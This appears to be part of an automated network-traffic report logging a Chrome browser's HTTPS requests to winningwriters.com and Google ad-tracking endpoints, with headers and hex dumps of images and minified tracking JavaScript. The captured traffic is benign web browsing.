                                                                                                                                                                                            2024-11-18 20:00:16 UTC3039INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 76 00 00 00 3d 08 06 00 00 00 20 54 24 7f 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 06 ee 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 62 30 66 38 62 65 39 30 2c 20 32 30 32 31 2f 31 32 2f 31 35 2d 32 31 3a 32 35 3a 31 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a
                                                                                                                                                                                            Data Ascii: PNGIHDRv= T$pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.b0f8be90, 2021/12/15-21:25:15 "> <rdf:


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            120192.168.2.1649855142.250.185.1944436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:16 UTC1245OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960013577&cv=11&fst=1731960013577&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:16 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:16 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:16 UTC675INData Raw: 31 33 31 34 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 1314(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:16 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:16 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:16 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:16 UTC83INData Raw: 6c 7a 4e 4d 6a 62 32 77 65 4d 37 74 53 2d 6b 5a 48 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 35 33 32 36 34 31 36 38 33 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: lzNMjb2weM7tS-kZH\x26random\x3d532641683\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            121192.168.2.1649856142.250.185.1644436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:16 UTC1490OUTGET /pagead/1p-user-list/1072733940/?random=1731960013577&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dSSZuYeQXg7zVXjDOs2NWq76UrUnPxMhDELtrFHg4lcXZP1m1&random=494036233&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:16 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:16 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:16 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            122192.168.2.164985866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1184OUTGET /assets/images/winningwriters.ico HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
                                                                                                                                                                                            2024-11-18 20:00:17 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:17 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:40 GMT
                                                                                                                                                                                            ETag: "57e-578fd6760a800"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                            Cache-Control: max-age=29030400, public
                                                                                                                                                                                            Expires: Wed, 20 Nov 2024 20:00:17 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1406INData Raw: 00 00 01 00 01 00 10 10 00 00 00 00 00 00 68 05 00 00 16 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 3b 63 da 00 9e b2 eb 00 01 31 cc 00 6c 8b e0 00 cd d6 f7 00 1b 4b d3 00 e7 ea f9 00 85 9c e7 00 53 76 de 00 b3 c3 f1 00 2c 55 d4 00 0d 3f cf 00 5f 7f e0 00 d9 df f6 00 48 6d db 00 ee f3 fc 00 7b 96 e6 00 bd c9 f1 00 96 aa eb 00 ab bd ec 00 25 4e d3 00 08 37 ce 00 8d a0 e9 00 34 5f d6 00 df e3 fb 00 15 41 d2 00 42 67 d9 00 5a 78 e1 00 66 82 e1 00 4d 72 da 00 31 59 d7 00 fa fb ff 00 d4 db f6 00 26 55 d5 00 20 4c d5 00 9c ad ec 00 ae c1 ee 00 96 ac e6 00 51 70 dd 00 87 a1 e7 00 62 84 de 00 ca d3 f4 00 67 87 e0 00 16 45 cf 00 3d 65 d6 00 5c 7b de 00 82
                                                                                                                                                                                            Data Ascii: h( @;c1lKSv,U?_Hm{%N74_ABgZxfMr1Y&U LQpbgE=e\{


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            123192.168.2.164985966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1222OUTGET /assets/fancybox/fancybox_sprite.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/fancybox/jquery.fancybox.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811; _gcl_au=1.1.325201710.1731960007; _rdt_uuid=1731960007977.814805a2-007a-47c4-a129-ea0a72736646; _gid=GA1.2.1788557778.1731960008; _dc_gtm_UA-216038-1=1; _fbp=fb.1.1731960008619.29400145611624610; _ga=GA1.1.723902191.1731960008; _ga_S2XE0RVPX9=GS1.1.1731960008.1.0.1731960013.55.0.0; wwpopup=popupseen
                                                                                                                                                                                            2024-11-18 20:00:17 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:17 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 13 Nov 2024 13:06:38 GMT
                                                                                                                                                                                            ETag: "552-626cb010b5380"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:17 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1362INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 98 08 03 00 00 00 a8 01 fb 50 00 00 00 bd 50 4c 54 45 00 00 00 00 00 00 00 00 00 0e 0e 0e 00 00 00 00 00 00 00 00 00 cd cd cd 01 01 01 d9 d9 d9 03 03 03 07 07 07 00 00 00 df df df 02 02 02 3f 3f 3f 01 01 01 00 00 00 82 82 82 1c 1c 1c e5 e5 e5 00 00 00 bf bf bf f1 f1 f1 06 06 06 67 67 67 00 00 00 ec ec ec 06 06 06 f8 f8 f8 3f 3f 3f c9 c9 c9 9e 9e 9e 67 67 67 f7 f7 f7 83 83 83 00 00 00 d0 d0 d0 f8 f8 f8 ae ae ae da da da fc fc fc ec ec ec 00 00 00 f9 f9 f9 fd fd fd de de de 00 00 00 ff ff ff 4e 4e 4e c1 c1 c1 35 35 35 ac ac ac 8d 8d 8d 9c 9c 9c 7a 7a 7a 5d 5d 5d 68 68 68 2c 2c 2c ba ba ba 22 22 22 ce ce ce 41 41 41 6d dc f0 8d 00 00 00 2f 74 52 4e 53 00 01 03 08 0d 12 19 1d 23 27 2d 3a 44
                                                                                                                                                                                            Data Ascii: PNGIHDR,PPLTE???ggg???gggNNN555zzz]]]hhh,,,"""AAAm/tRNS#'-:D


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            124192.168.2.1649857142.250.186.1324436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1252OUTGET /pagead/1p-user-list/1072733940/?random=1731960013577&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dSSZuYeQXg7zVXjDOs2NWq76UrUnPxMhDELtrFHg4lcXZP1m1&random=494036233&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:17 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:17 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:17 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            125192.168.2.164986166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:17 UTC1204OUTGET /assets/fancybox/fancybox_overlay.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/assets/fancybox/jquery.fancybox.css
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
